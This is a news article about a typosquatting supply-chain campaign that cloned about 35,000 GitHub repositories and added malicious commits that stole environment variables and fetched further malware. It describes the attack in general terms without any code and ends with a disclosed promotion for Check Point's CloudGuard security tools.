News & Analysis

Github Users Targeted in Supply Chain Attack

Just this morning, a significant software “supply chain” attack was discovered in Github, and while the attack was prevented from spreading further, the ramifications of “supply chain” attacks are clear and intimidating.

This recent attack was executed in Github – the most popular code repository used by over 83 million developers across the globe. Their repository allows developers to track and control the source code that they store in the repository. Its users represent the largest coding community in the world.

“This morning, a malicious repositories’ cloning campaign was identified on Github. The attackers used Typosquatting techniques to clone and re-publish popular repositories under fake account names, mimicking the original ones, and adding extra commits with malicious code. The goal of the attackers was to steal environment variables, and in some cases, even enable backdoors to machines.

This attack highlights again how severe easy is to conduct supply chain attacks. These types of attacks are spreading wide on open source channels, from NPM and PYPI to now Github. At Check Point, our mission is to keep your development safe against supply chain attacks and threats”, says Lotem Finkelsteen, Head of Threat Intelligence at Check Point Software.


What is Github?

Github allows developers to collaborate on code repositories, so that other developers can contribute to code which is not their own, while giving the owner of the original code full control to accept or reject changes made by another member of the community.

It is common for developers to download code repositories and use the code in their own applications.

In a situation where a developer wants to significantly change the code of another developer, they use Github’s Clone function. This allows a developer to create an exact copy of someone else’s code – where the original version remains untouched under the management of its original author. It retains its existing interaction stats like views, contributions and followers, while the new cloned version is under new ownership with no interaction stats associated with it because essentially it is new code (albeit copied from something existing).


What actually happened?

Just recently, a malicious actor cloned upwards of 35,000 Github repositories and kept them identical to the original source code, with the addition of malicious code. This malicious code was able to build a fingerprint – to collect details of the environment in which it is executed. The code could collect device identity, the identity of the user and possibly additional sensitive data.

More significantly this code included the ability to download additional malware from a third party site. This additional malware could further exploit any application or environment which was using this code which originated in the weaponized cloned repositories in Github.

The developers’ community identified the malicious implant within code that was downloaded from Github and immediately the community feared that source code from the original repositories had been infected by this malware. However upon further research it became clear that the infected code was in fact Cloned code which had been downloaded from Github under the assumption that the developer was downloading the original non-malicious repository.

This has potentially catastrophic implications for the software “supply chain” where an unassuming developer mistakenly downloads a cloned code repository which includes malicious code, uses it for their own purposes and then unknowingly provides their users with code that includes malware.


How to prevent supply chain attacks

The practice of shifting security “left” and providing security teams with automated tools for DevOps to bake security into their pipelines is not new, but adoption is slow. This attempt to attack innumerable environments and applications is a clear example of why supply chain security is critical.

Check Point CloudGuard includes automated security tools for developers in order to ensure that all code is security centric. It scans infrastructure-as-code and source code to eliminate threats at the earliest phase.


(Disclaimer – The article contains some material that is meant for publicising the tools available with Check Point and as publishers we are providing the information without any bias towards or away from the brand or the products)

Leave a Response